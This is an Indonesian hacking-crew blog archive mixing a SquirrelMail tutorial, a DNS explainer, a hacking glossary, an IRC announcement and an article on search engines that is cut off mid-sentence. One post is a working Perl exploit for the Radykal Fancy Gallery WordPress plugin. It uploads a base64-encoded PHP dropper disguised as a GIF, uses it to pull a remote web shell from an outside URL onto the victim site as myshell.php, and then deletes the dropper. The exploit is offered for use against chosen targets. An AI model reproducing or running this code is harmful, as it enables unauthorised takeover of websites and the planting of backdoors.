Tampilkan postingan dengan label Lain-Lain. Tampilkan semua postingan
Tampilkan postingan dengan label Lain-Lain. Tampilkan semua postingan

Sabtu, 21 Juli 2012

Tutorial Pemakaian Webmail Server Cpanel [SquirrelMail]

  1. Login Webmail/Webserver

  2. Login Webmail, Webserver
    1. Masukan Alamat Email
    2. Masukan Password Anda
    3. Kemudian Tekan Tombol Login

  3. Pilih WebMail Server

  4. Webmail, SquirrelMail, Atmail, Horde, roundcube
    Setelah Login akan terlihat seperti gambar di atas,, disini saya akan memilih Webmail SquirrelMail karna dsni saya akan membahas tentang SquirrelMail :D,, anda jg bsa menggunakan webmail server yg lain,,
  5. Menukar Bahasa

  6. Menukar Bahasa, setting bahasa, Webmail, SquirrelMail
    Tekan Option, lalu akan muncul sperti kotak di bawah ini,,,

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    Setelah Itu Pilih Display Preferences,, muncul kotak dialog seperti di bawah ini

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    1. Merubah Thema
    2. Merubah Bentuk Tulisan
    3. Merubah Bahasa
    Silahkan Pilih Nomor 3,, di ganti dengan Bahasa Indonesia,, pilih aja yang mana anda suka ;D,, setelah selesai tekan tombol paling bawah yang tulisannya submit dlm bahasa inggris atau kirim dalam bahasa indonesia

  7. Mengirim pesan
  8. mengirim pesan, kirim pesan, Webmail, SquirrelMail
    pilih tulisan , lalu akan muncul kotak seperti di bawah ini

    mengirim pesan, kirim pesan, Webmail, SquirrelMail
    1. Alamat Email Yang akan di kirim
    2. CC : Carbon Copy di gunakan untuk mengirim ke bnyak orang sama fungsinya dengan tag,, BCC sama fungsinya dg CC
    3. Subject merupakan judul pesan yang akan di kirim
    4. Prioritas digunakan untuk Status Pesan, Contoh : Biasa dan pesan ini tidak terlalu penting
    5. Ini adalah Tempat Untuk Isi Pesan
    6. Lampiran Ibarat Mengirim Barang di Post,, lampiran di gunakan untuk mengirim suatu file ke email
    7. Setelah Selesai Lalu Kirim
cukup sekian artikelnya kali ini klau ada pertanyaan silahkan di komentar,,,,, :D

Senin, 16 Juli 2012

[PERL] Exploit Radykal Fancy Gallery

#!/usr/bin/perl

print "################################################################\n";
print "                Radykal Fancy Gallery Exploit\n";
print " Author   : Jefry AnasKi\n";
print " Contact  : jefry@anaski.net\n";
print " Homepage : www.anaski.net | blog.anaski.net\n";
print " Thank to :\n";
print "             BlueBoyz, AnasKi CreW, ExploreCrew\n";
print "################################################################\n";

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;                          
use LWP 5.64;
use LWP::UserAgent;
use Socket;                                  
use IO::Socket;                              
use IO::Socket::INET;                      
use IO::Select;   
use MIME::Base64;
use Cwd 'abs_path';
system 'clear';
system 'cls';

print "\r\nmasukan url target \r\n";
print "ex : http://blog.anaski.net/\r\n";
print "==> ";
my $web = <STDIN>;
chop($web);
my $url = $web."/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php";
my $path = abs_path($0);
my $shell = "R0lGODlhAT8BPz8/P////yH5BAE/Pz8/LD8/Pz8BPwE/PwICRAE/Oz88P3BocA0KICAgICAgICAgICAgJHNoeCA9IEAkX0dFVFsidXJsIl07DQoJCQlAY29weSgiJHNoeCIsIm15c2hlbGwucGhwIik7DQoJaWYgKEAkX0dFVFsnYWN0J109PSAnZGVsJyl7ICAgDQogICAgICAgIGlmICh1bmxpbmsoX19GSUxFX18pKSB7IEBvYl9jbGVhbigpOyBlY2hvICI8YnIvPkpGcnlfIFdhcyBIZXJlISI7IH0NCiAgICAgICAgZWxzZSB7IGVjaG8gIjxjZW50ZXI+PGI+Q2FuJ3QgZGVsZXRlICIuX19GSUxFX18uIiE8L2I+PC9jZW50ZXI+IjsgfQ0KICB9DQo/Pg";
my $sh = decode_base64($shell);
open (code, '>exp.php');
print code $sh;
close (code);

my     $ua = LWP::UserAgent->new;
    $ua->agent("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54)");
my $get = $ua->post ($url, "Content" => ["file[]" => ["exp.php"]],'Content_Type' => 'form-data')->as_string;
    $ua->timeout(7);

if ($get =~ /error":0/ ) {
    print "\r\nmasukan url shell \r\n";
    print "ex : http://anaski.net/tool/c99.txt\r\n";
    print "==> ";

    my $hasil = <STDIN>;
    chop($hasil);
    my ($urlx) = ($get =~ /realFile":"(.*)"}/);
    my ($exp) = ($url =~ /(.*)image-upload.php/);
    &openweb($exp.$urlx."?&url=".$hasil);
    &openweb($exp.$urlx."?&act=del");
    print "\r\nhasil ==> ".$exp."/myshell.php\r\n";
  
} elsif ($get =~ /"error":1/ ){
    print "File exp.php is not an image";
} else {
    print "Silahkan Cari Target Lain";
}



sub openweb() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}
 
refrensi : http://forum.explorecrew.org/index.php?topic=1166.0

Jumat, 17 Juni 2011

Sistem Penamaan Domain

DNS (Domain Name System, bahasa Indonesia: Sistem Penamaan Domain) adalah sebuah sistem yang menyimpan informasi tentang nama host maupun nama domain dalam bentuk basis data tersebar (distributed database) di dalam jaringan komputer, misalkan: Internet. DNS menyediakan alamat IP untuk setiap nama host dan mendata setiap server transmisi surat (mail exchange server) yang menerima surat elektronik (email) untuk setiap domain.

DNS menyediakan servis yang cukup penting untuk Internet, bilamana perangkat keras komputer dan jaringan bekerja dengan alamat IP untuk mengerjakan tugas seperti pengalamatan dan penjaluran (routing), manusia pada umumnya lebih memilih untuk menggunakan nama host dan nama domain, contohnya adalah penunjukan sumber universal (URL) dan alamat e-mail. Analogi yang umum digunakan untuk menjelaskan fungsinya adalah DNS bisa dianggap seperti buku telepon internet dimana saat pengguna mengetikkan www.example.com di internet browser maka pengguna akan diarahkan ke alamat IP 192.0.32.10 (IPv4) dan 2620:0:2d0:200::10 (IPv6).

Sejarah singkat DNS

Penggunaan nama sebagai pengabstraksi alamat mesin di sebuah jaringan komputer yang lebih dikenal oleh manusia mengalahkan TCP/IP, dan kembali ke zaman ARPAnet. Dahulu, setiap komputer di jaringan komputer menggunakan file HOSTS.TXT dari SRI (sekarang SIR International), yang memetakan sebuah alamat ke sebuah nama (secara teknis, file ini masih ada - sebagian besar sistem operasi modern menggunakannya baik secara baku maupun melalui konfigurasi, dapat melihat Hosts file untuk menyamakan sebuah nama host menjadi sebuah alamat IP sebelum melakukan pencarian via DNS). Namun, sistem tersebut diatas mewarisi beberapa keterbatasan yang mencolok dari sisi prasyarat, setiap saat sebuah alamat komputer berubah, setiap sistem yang hendak berhubungan dengan komputer tersebut harus melakukan update terhadap file Hosts.

Dengan berkembangnya jaringan komputer, membutuhkan sistem yang bisa dikembangkan: sebuah sistem yang bisa mengganti alamat host hanya di satu tempat, host lain akan mempelajari perubaha tersebut secara dinamis. Inilah DNS.

Paul Mockapetris menemukan DNS di tahun 1983; spesifikasi asli muncul di RFC 882 dan 883. Tahun 1987, penerbitan RFC 1034 dan RFC 1035 membuat update terhadap spesifikasi DNS. Hal ini membuat RFC 882 dan RFC 883 tidak berlaku lagi. Beberapa RFC terkini telah memproposikan beberapa tambahan dari protokol inti DNS.

Teori bekerja DNS

Para Pemain Inti

Pengelola dari sistem DNS terdiri dari tiga komponen:

  • DNS resolver, sebuah program klien yang berjalan di komputer pengguna, yang membuat permintaan DNS dari program aplikasi.
  • recursive DNS server, yang melakukan pencarian melalui DNS sebagai tanggapan permintaan dari resolver, dan mengembalikan jawaban kepada para resolver tersebut;

dan ...

  • authoritative DNS server yang memberikan jawaban terhadap permintaan dari recursor, baik dalam bentuk sebuah jawaban, maupun dalam bentuk delegasi (misalkan: mereferensikan ke authoritative DNS server lainnya)

Pengertian beberapa bagian dari nama domain

Sebuah nama domain biasanya terdiri dari dua bagian atau lebih (secara teknis disebut label), dipisahkan dengan titik.

  • Label paling kanan menyatakan top-level domain - domain tingkat atas/tinggi (misalkan, alamat www.wikipedia.org memiliki top-level domain org).
  • Setiap label di sebelah kirinya menyatakan sebuah sub-divisi atau subdomain dari domain yang lebih tinggi. Catatan: "subdomain" menyatakan ketergantungan relatif, bukan absolut. Contoh: wikipedia.org merupakan subdomain dari domain org, dan id.wikipedia.org dapat membentuk subdomain dari domain wikipedia.org (pada praktiknya, id.wikipedia.org sesungguhnya mewakili sebuah nama host - lihat dibawah). Secara teori, pembagian seperti ini dapat mencapai kedalaman 127 level, dan setiap label dapat terbentuk sampai dengan 63 karakter, selama total nama domain tidak melebihi panjang 255 karakter. Tetapi secara praktik, beberapa pendaftar nama domain (domain name registry) memiliki batas yang lebih sedikit.
  • Terakhir, bagian paling kiri dari bagian nama domain (biasanya) menyatakan nama host. Sisa dari nama domain menyatakan cara untuk membangun jalur logis untuk informasi yang dibutuhkan; nama host adalah tujuan sebenarnya dari nama sistem yang dicari alamat IP-nya. Contoh: nama domain www.wikipedia.org memiliki nama host "www".

DNS memiliki kumpulan hirarki dari DNS servers. Setiap domain atau subdomain memiliki satu atau lebih authoritative DNS Servers (server DNS otorisatif) yang mempublikasikan informas tentang domain tersebut dan nama-nama server dari setiap domain di-"bawah"-nya. Pada puncak hirarki, terdapat root servers- induk server nama: server yang ditanyakan ketika mencari (menyelesaikan/resolving) dari sebuah nama domain tertinggi (top-level domain).

Sebuah contoh dari teori rekursif DNS

Sebuah contoh mungkin dapat memperjelas proses ini. Andaikan ada aplikasi yang memerlukan pencarian alamat IP dari www.wikipedia.org. Aplikasi tersebut bertanya ke DNS recursor lokal.

  • Sebelum dimulai, recursor harus mengetahui dimana dapat menemukan root nameserver; administrator dari recursive DNS server secara manual mengatur (dan melakukan update secara berkala) sebuah file dengan nama root hints zone (panduan akar DNS) yang menyatakan alamat-alamt IP dari para server tersebut.
  • Proses dimulai oleh recursor yang bertanya kepada para root server tersebut - misalkan: server dengan alamat IP "198.41.0.4" - pertanyaan "apakah alamat IP dari www.wikipedia.org?"
  • Root server menjawab dengan sebuah delegasi, arti kasarnya: "Saya tidak tahu alamat IP dari www.wikipedia.org, tapi saya "tahu" bahwa server DNS di 204.74.112.1 memiliki informasi tentang domain org."
  • Recursor DNS lokal kemudian bertanya kepada server DNS (yaitu: 204.74.112.1) pertanyaan yang sama seperti yang diberikan kepada root server. "apa alamat IP dari www.wikipedia.org?". (umumnya) akan didapatkan jawaban yang sejenis, "saya tidak tahu alamat dari www.wikipedia.org, tapi saya "tahu" bahwa server 207.142.131.234 memiliki informasi dari domain wikipedia.org."
  • Akhirnya, pertanyaan beralih kepada server DNS ketiga (207.142.131.234), yang menjawab dengan alamat IP yang dibutuhkan.

Proses ini menggunakan pencarian rekursif (recursion / recursive searching).

Pengertian pendaftaran domain dan glue records

Membaca contoh diatas, Anda mungkin bertanya: "bagaimana caranya DNS server 204.74.112.1 tahu alamat IP mana yang diberikan untuk domain wikipedia.org?" Pada awal proses, kita mencatat bahwa sebuah DNS recursor memiliki alamat IP dari para root server yang (kurang-lebih) didata secara explisit (hard coded). Mirip dengan hal tersebut, server nama (name server) yang otoritatif untuk top-level domain mengalami perubahan yang jarang.

Namun, server nama yang memberikan jawaban otorisatif bagi nama domain yang umum mengalami perubahan yang cukup sering. Sebagai bagian dari proses pendaftaran sebuah nama domain (dan beberapa waktu sesudahnya), pendaftar memberikan pendaftaran dengan server nama yang akan mengotorisasikan nama domain tersebut; maka ketika mendaftar wikipedia.org, domain tersebut terhubung dengan server nama gunther.bomis.com dan zwinger.wikipedia.org di pendaftar .org. Kemudian, dari contoh di atas, ketika server dikenali sebagai 204.74.112.1 menerima sebuah permintaan, DNS server memindai daftar domain yang ada, mencari wikipedia.org, dan mengembalikan server nama yang terhubung dengan domain tersebut.

Biasanya, server nama muncul berdasarkan urutan nama, selain berdasarkan alamat IP. Hal ini menimbulkan string lain dari permintaan DNS untuk menyelesaikan nama dari server nama; ketika sebuah alamat IP dari server nama mendapatkan sebuah pendaftaran di zona induk, para programmer jaringan komputer menamakannya sebuah glue record (daftar lekat???)

DNS dalam praktik

Ketika sebuah aplikasi (misalkan web broswer), hendak mencari alamat IP dari sebuah nama domain, aplikasi tersebut tidak harus mengikuti seluruh langkah yang disebutkan dalam teori diatas. Kita akan melihat dulu konsep caching, lalu mengertikan operasi DNS di "dunia nyata".

Caching dan masa hidup (caching and time to live)

Karena jumlah permintaan yang besar dari sistem seperti DNS, perancang DNS menginginkan penyediaan mekanisme yang bisa mengurangi beban dari masing-masing server DNS. Rencana mekanisnya menyarankan bahwa ketika sebuah DNS resolver (klien) menerima sebuah jawaban DNS, informasi tersebut akan di cache untuk jangka waktu tertentu. Sebuah nilai (yang di-set oleh administrator dari server DNS yang memberikan jawaban) menyebutnya sebagai time to live (masa hidup), atau TTL yang mendefinisikan periode tersebut. Saat jawaban masuk ke dalam cache, resolver akan mengacu kepada jawaban yang disimpan di cache tersebut; hanya ketika TTL usai (atau saat administrator mengosongkan jawaban dari memori resolver secara manual) maka resolver menghubungi server DNS untuk informasi yang sama.

Waktu propagasi (propagation time)

Satu akibat penting dari arsitektur tersebar dan cache adalah perubahan kepada suatu DNS tidak selalu efektif secara langsung dalam skala besar/global. Contoh berikut mungkin akan menjelaskannya: Jika seorang administrator telah mengatur TTL selama 6 jam untuk host www.wikipedia.org, kemudian mengganti alamat IP dari www.wikipedia.org pada pk 12:01, administrator harus mempertimbangkan bahwa ada (paling tidak) satu individu yang menyimpan cache jawaban dengan nilai lama pada pk 12:00 yang tidak akan menghubungi server DNS sampai dengan pk 18:00. Periode antara pk 12:00 dan pk 18:00 dalam contoh ini disebut sebagai waktu propagasi (propagation time), yang bisa didefiniskan sebagai periode waktu yang berawal antara saat terjadi perubahan dari data DNS, dan berakhir sesudah waktu maksimum yang telah ditentukan oleh TTL berlalu. Ini akan mengarahkan kepada pertimbangan logis yang penting ketika membuat perubahan kepada DNS: tidak semua akan melihat hal yang sama seperti yang Anda lihat. RFC1537 dapat membantu penjelasan ini.

DNS di dunia nyata

Di dunia nyata, user tidak berhadapan langsung dengan DNS resolver - mereka berhadapan dengan program seperti web brower (Mozilla Firefox, Safari, Opera, Internet Explorer, Netscape, Konqueror dan lain-lain dan klien mail (Outlook Express, Mozilla Thunderbird dan lain-lain). Ketika user melakukan aktivitas yang meminta pencarian DNS (umumnya, nyaris semua aktivitas yang menggunakan Internet), program tersebut mengirimkan permintaan ke DNS Resolver yang ada di dalam sistem operasi.

DNS resolver akan selalu memiliki cache (lihat diatas) yang memiliki isi pencarian terakhir. Jika cache dapat memberikan jawaban kepada permintaan DNS, resolver akan menggunakan nilai yang ada di dalam cache kepada program yang memerlukan. Kalau cache tidak memiliki jawabannya, resolver akan mengirimkan permintaan ke server DNS tertentu. Untuk kebanyakan pengguna di rumah, Internet Service Provider(ISP) yang menghubungkan komputer tersebut biasanya akan menyediakan server DNS: pengguna tersebut akan mendata alamat server secara manual atau menggunakan DHCP untuk melakukan pendataan tersebut. Namun jika administrator sistem / pengguna telah mengkonfigurasi sistem untuk menggunakan server DNS selain yang diberikan secara default oleh ISP misalnya seperti Google Public DNS ataupun OpenDNS[1], maka DNS resolver akan mengacu ke DNS server yang sudah ditentukan. Server nama ini akan mengikuti proses yang disebutkan di Teori DNS, baik mereka menemukan jawabannya maupun tidak. Hasil pencarian akan diberikan kepada DNS resolver; diasumsikan telah ditemukan jawaban, resolver akan menyimpan hasilnya di cache untuk penggunaan berikutnya, dan memberikan hasilnya kepada software yang meminta pencarian DNS tersebut.

Sebagai bagian akhir dari kerumitan ini, beberapa aplikasi seperti web browser juga memiliki DNS cache mereka sendiri, tujuannya adalah untuk mengurangi penggunaan referensi DNS resolver, yang akan meningkatkan kesulitan untuk melakukan debug DNS, yang menimbulkan kerancuan data yang lebih akurat. Cache seperti ini umumnya memiliki masa yang singkat dalam hitungan 1 menit.

Penerapan DNS lainnya

Sistem yang dijabarkan diatas memberikan skenario yang disederhanakan. DNS meliputi beberapa fungsi lainnya:

  • Nama host dan alamat IP tidak berarti terhubung secara satu-banding-satu. Banyak nama host yang diwakili melalui alamat IP tunggal: gabungan dengan pengasuhan maya (virtual hosting), hal ini memungkinkan satu komputer untuk malayani beberapa situs web. Selain itu, sebuah nama host dapat mewakili beberapa alamat IP: ini akan membantu toleransi kesalahan (fault tolerance dan penyebaran beban (load distribution), juga membantu suatu situs berpindah dari satu lokasi fisik ke lokasi fisik lainnya secara mudah.
  • Ada cukup banyak kegunaan DNS selain menerjemahkan nama ke alamat IP. Contoh:, agen pemindahan surat Mail transfer agents(MTA) menggunakan DNS untuk mencari tujuan pengiriman E-mail untuk alamat tertentu. Domain yang menginformasikan pemetaan exchange disediakan melalui rekod MX (MX record) yang meningkatkan lapisan tambahan untuk toleransi kesalahan dan penyebaran beban selain dari fungsi pemetaan nama ke alamat IP.
  • Kerangka Peraturan Pengiriman (Sender Policy Framework) secara kontroversi menggunakan keuntungan jenis rekod DNS, dikenal sebagai rekod TXT.
  • Menyediakan keluwesan untuk kegagalan komputer, beberapa server DNS memberikan perlindungan untuk setiap domain. Tepatnya, tigabelas server akar (root servers) digunakan oleh seluruh dunia. Program DNS maupun sistem operasi memiliki alamat IP dari seluruh server ini. Amerika Serikat memiliki, secara angka, semua kecuali tiga dari server akar tersebut. Namun, dikarenakan banyak server akar menerapkan anycast, yang memungkinkan beberapa komputer yang berbeda dapat berbagi alamat IP yang sama untuk mengirimkan satu jenis services melalui area geografis yang luas, banyak server yang secara fisik (bukan sekedar angka) terletak di luar Amerika Serikat.

DNS menggunanakn TCP dan UDP di port komputer 53 untuk melayani permintaan DNS. Nyaris semua permintaan DNS berisi permintaan UDP tunggal dari klien yang dikuti oleh jawaban UDP tunggal dari server. Umumnya TCP ikut terlibat hanya ketika ukuran data jawaban melebihi 512 byte, atau untuk pertukaaran zona DNS zone transfer

Jenis-jenis catatan DNS

Beberapa kelompok penting dari data yang disimpan di dalam DNS adalah sebagai berikut:

  • A record atau catatan alamat memetakan sebuah nama host ke alamat IP 32-bit (untuk IPv4).
  • AAAA record atau catatan alamat IPv6 memetakan sebuah nama host ke alamat IP 128-bit (untuk IPv6).
  • CNAME record atau catatan nama kanonik membuat alias untuk nama domain. Domain yang di-alias-kan memiliki seluruh subdomain dan rekod DNS seperti aslinya.
  • [MX record]]' atau catatan pertukaran surat memetakan sebuah nama domain ke dalam daftar mail exchange server untuk domain tersebut.
  • PTR record atau catatan penunjuk memetakan sebuah nama host ke nama kanonik untuk host tersebut. Pembuatan rekod PTR untuk sebuah nama host di dalam domain in-addr.arpa yang mewakili sebuah alamat IP menerapkan pencarian balik DNS (reverse DNS lookup) untuk alamat tersebut. Contohnya (saat penulisan / penerjemahan artikel ini), www.icann.net memiliki alamat IP 192.0.34.164, tetapi sebuah rekod PTR memetakan ,,164.34.0.192.in-addr.arpa ke nama kanoniknya: referrals.icann.org.
  • NS record atau catatan server nama memetakan sebuah nama domain ke dalam satu daftar dari server DNS untuk domain tersebut. Pewakilan bergantung kepada rekod NS.
  • SOA record atau catatan otoritas awal (Start of Authority) mengacu server DNS yang mengediakan otorisasi informasi tentang sebuah domain Internet.
  • SRV record adalah catatan lokasi secara umum.
  • Catatan TXT mengijinkan administrator untuk memasukan data acak ke dalam catatan DNS; catatan ini juga digunakan di spesifikasi Sender Policy Framework.

Jenis catatan lainnya semata-mata untuk penyediaan informasi (contohnya, catatan LOC memberikan letak lokasi fisik dari sebuah host, atau data ujicoba (misalkan, catatan WKS memberikan sebuah daftar dari server yang memberikan servis yang dikenal (well-known service) seperti HTTP atau POP3 untuk sebuah domain.

Nama domain yang diinternasionalkan

Nama domain harus menggunakan satu sub-kumpulan dari karakter ASCII, hal ini mencegah beberapa bahasa untuk menggunakan nama maupun kata lokal mereka. ICANN telah menyetujui Punycode yang berbasiskan sistem IDNA, yang memetakan string Unicode ke karakter set yang valid untuk DNS, sebagai bentuk penyelesaian untuk masalah ini, dan beberapa registries sudah mengadopsi metode IDNS ini.

Perangkat lunak DNS

Beberapa jenis perangakat lunak DNS menerapkan metode DNS, beberapa diantaranya:

Utiliti berorientasi DNS termasuk:

  • dig (the domain information groper)

Pengguna legal dari domain

Pendaftar (registrant)

Tidak satupun individu di dunia yang "memiliki" nama domain kecuali Network Information Centre (NIC), atau pendaftar nama domain (domain name registry). Sebagian besar dari NIC di dunia menerima biaya tahunan dari para pengguna legal dengan tujuan bagi si pengguna legal menggunakan nama domain tersebut. Jadi sejenis perjanjian sewa-menyewa terjadi, bergantung kepada syarat dan ketentuan pendaftar. Bergantung kepada beberpa peraturan penamaan dari para pendaftar, pengguna legal dikenal sebagai "pendaftar" (registrants) atau sebagai "pemegang domain" (domain holders)

ICANN memegang daftar lengkap untuk pendaftar domain di seluruh dunia. Siapapun dapat menemukan pengguna legal dari sebuah domain dengan mencari melalui basis data WHOIS yang disimpan oleh beberpa pendaftar domain.

Di (lebih kurang) 240 country code top-level domains (ccTLDs), pendaftar domain memegang sebuah acuan WHOIS (pendaftar dan nama server). Contohnya, IDNIC, NIC Indonesia, memegang informasi otorisatif WHOIS untuk nama domain .ID.

Namun, beberapa pendaftar domain, seperti VeriSign, menggunakan model pendaftar-pengguna. Untuk nama domain .COM dan .NET, pendaftar domain, VeriSign memegang informasi dasar WHOIS )pemegang domain dan server nama). Siapapun dapat mencari detil WHOIS (Pemegang domain, server nama, tanggal berlaku, dan lain sebagainya) melalui pendaftar.

Sejak sekitar 2001, kebanyakan pendaftar gTLD (.ORG, .BIZ, .INFO) telah mengadopsi metode penfatar "tebal", menyimpan otoritatif WHOIS di beberapa pendaftar dan bukan pendaftar itu saja.

Kontak Administratif (Administrative Contact)

Satu pemegang domain biasanya menunjuk kontak administratif untuk menangani nama domain. Fungsi manajemen didelegasikan ke kontak administratif yang mencakup (diantaranya):

  • keharusan untuk mengikuti syarat dari pendaftar domain dengan tujuan memiliki hak untuk menggunakan nama domain
  • otorisasi untuk melakukan update ke alamat fisik, alamat email dan nomor telepon dan lain sebagainya via WHOIS

Kontak Teknis (Technical Contact)

Satu kontak teknis menangani server nama dari sebuah nama domain. Beberapa dari banyak fungsi kontak teknis termasuk:

  • memastikan bahwa konfigurasi dari nama domain mengikuti syarat dari pendaftar domain
  • update zona domain
  • menyediakan fungsi 24x7 untuk ke server nama (yang membuat nama domain bisa diaksesKontak Pembayaran (Billing Contact)

Tidak perlu dijelaskan, pihak ini adalah yang menerima tagihan dari NIC.

Server Nama (Name Servers)

Disebut sebagai server nama otoritatif yang mengasuh zona nama domain dari sebuah nama domain.


Sumber : http://www.cimpli.uni.cc/2011/05/sistem-penamaan-domain.html

Minggu, 12 Juni 2011

Beberpa istilah di dalam Hacking

SQL Injection

  • injeksi kode teknik yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL
DDOS [ Distributed Denial of Service ]

  • serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim, spt bandwith, memory, dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar, biasanya menggunakan bot pd irc atau pakai sesuatu tool.
Bug


Patch
  • adalah tambalan dalam bentuk source code, jadi yang ditambal itu bukan binarynya tapi source codenya. Ini berbeda dengan istilah Service Pack di sistem operasi lain yang bukan merupakan sebuah patch atau tambalan, karena Service Pack itu mengganti binary dengan binary yang baru yang mempunyai feature baru dan atau menutupi bug di binary yang lama.

Vurnerable
  • sebuah system yg mempunyai suatu kelemahan yg mudah untuk di serang
Shell

  • adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

Deface
  • adalah merubah tampilan web orang dg paksa dengan mengganti index halaman pada suatu website.

Debug
  • sebuah metode yang dilakukan oleh para pemrogram dan pengembang perangkat lunak untuk meng-analisa alur kerja program, mencari dan mengurangi bug, atau kerusakan di dalam sebuah program komputer atau perangkat keras sehingga perangkat tersebut bekerja sesuai dengan harapan. Debugging cenderung lebih rumit ketika beberapa subsistem lainnya terikat dengan ketat dengannya, mengingat sebuah perubahan di satu sisi, mungkin dapat menyebabkan munculnya bug lain di dalam subsistem lainnya.
XSS
  • adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising

  • adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal dalam bentuk sebuah web alias pemalsuan.

Keylogger

  • adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata dalam artian katak spy )

AnasKi CreW IRC Network Server

hello Viva AnasKi krn udh lama g update post akhirnya saya update lagi nih kli ni sya kan buat tutorial yg lebih mantap....

kali ini cukup dg server baru kami :D

irc.pasbar.com

untuk inginkan sebuah vhost bisa lansung menuju channel : #vhost
untuk bertanya silahkan masuk saja ke channel : #help dan tunggu respone dari kami

jika ada pertanyaan yg lain silahkan masuk ke channel anaski di irc.pasbar.com dan pv JFry_ jka ada waktu luang sya akan menjawab pertanyaan nya

jng lupa Free PsyBnc tapi hnya buat server anaski saja ya :D

Sabtu, 19 Maret 2011

Jenis-jenis Search Engine

Mesin pencari (search engine) adalah salah satu program komputer yang di rancang
khusus untuk membantu seseorang menemukan file-file yang disimpan dalam computer,
misalnya dalam sebuah web server umum di web (www) atau komputer sendiri. Mesin pencari
memungkinkan kita untuk meminta content media dengan criteria yang spesipik ( biasanya
berisikan prase atau kata yang kita inginkan) dan memperoleh daftar file yang memenuhi criteria
tersebut. Mesin pencari biasanya menggunakan indeks ( yang sudah di buat sebelumnya dan di
mutakhirkan secara teratur ) untuk mencari file setelah pengguna memasukan kriteria pencarian.
Mesin pencari yang akan saya bahas adalah mesin pencari khusus yang di gunakan untuk
mencari informasi dan berbagai file di Internet, sehingga mesin pencari sangat berguna bagi para
penggunanya untuk mencari berbagai bahan referensi atau lainnya.
Untuk memudahkan pencarian di database yang begitu besar, mesin pencari
menggunakan indeks untuk memilah-milah informasi yang ada di database. Sedangkan untuk
memudahkan dan mempercepat pencarian, mesin pencari mempunyai metode pencarian tertentu
yang sering di sebut algoritma pencarian, kecepatan dan ketepatan pencarian sebuah mesin
pencarian tergantung kepada cara pengindeksan dan algoritma pencarian ayng digunakan.

Struktur umum sebuah mesin pencari adalah sebagai berikut :

a. Kotak teks pencari
Kotak ini digunakan sebagai tempat memasukan kata kunci yang akan dijadikan
acuan dilakukan pencarian.

b. Tombol pencari
Tobol ini yang akan menjalankan perintah pencarian.

JENIS-JENIS MESIN PENCARI

Berdasarkan cara mengumpulkan data halaman-halaman web, mesin pencari dapat di
kelompokkan menjadi 4 kategori

- Human Organized Search Engine

Mesin pencari yang di kelola sepenuhnya oleh tangan manusia. Mesin pencari ini
menggunakan metode dengan memilah-milih informasi yang relevan dan dikelompokan
sedemikian rupa sehingga lebih bermakna dan bermanfaaat bagi penggunannya. Situs ini dalam
prakteknya memperkerjakan para pakar dalam bidang-bidang tertentu, kemudian para pakar
tersebut dapat mengkelompokan situs-situs tertentu sesuai dengan bidangnnya atau kategori situs
itu sendiri.

www.yahoo.com
www.looksmart.com
www.about.com
Dmoz.org

- Computer Created Search Engine

Search engine kategori ini banyak memiliki kelebihan karena banyak menyajikan
inforrmasi walaupun kadang-kadang ada beberapa informasi yang tida relevan tidak seperti yag
kita ingin kan. Search engine ini telah menggunakan software laba-laba atau spider software
yang berfungsi menyusup pada situs-situs tertentu, kemudian mengunpulkan data serta
mengelompokan dengan sedikit bantuan tangan manusia.

www.webcrawler.com
www.excite.com
www.inktomi.com
www.nothernlight.com
www.altheweb.com

- Hybrid Seacrh Engine

Merupakan gabungan antara tangan manusia dengan computer, sehingga menghasilkan
hasil pencarian yang relative akurat. Peran manusia dalam hal ini adalah sebagai penelaah dalam
proses pengkoleksian database halaman web. Sebenarnya tipe ini lah yanag paling mudah
pembuatannya menurut saya karena dapat di desaingsesuai dengan keinginan kita.

www.lycos.com
www.altavista.com
www.hotbot.com
www.goto.com
www.snap.com
www.directthit.com
www.google.com
go.com

- MetaCrawler/Metasearch
Merupakan perantara dari mesin pencari yang sebenarnya. Mesin ini hanya akan
mengirimkan permintaan pencarian ke berbagai mesin pencari serta menampilkan hasilnya satu
di layer browser sehingga akan menampilkan banyak sekali hasil dari ber bagai mesin pencari
yang ada.

savvysearch.com
www.dogpile.com
www.infind.com
www.snap.com

Cara kerja mesin pencari

Mesin pencari web bekerja dengan cara menyimpan informasi tertang banyak halaman
web, yang diambil secara langsung dari www. Halaman ini di ambil dengan web
crawler-browsewr web yang otomatis mengikuti setiap pranala yang di lihatnya. Isi setiap
halaman lalu dianalisis untuk menentukan cara mengindeksnya (misalnya kata-kata di ambil dari
judul, subjudul, atau field khusus yang di sebut meta tag ). Data tentang halaman web disimpan
dalam sebuah database indeks untuk di gunakan dalam pencarian selanjutnya. Sebagian mesin
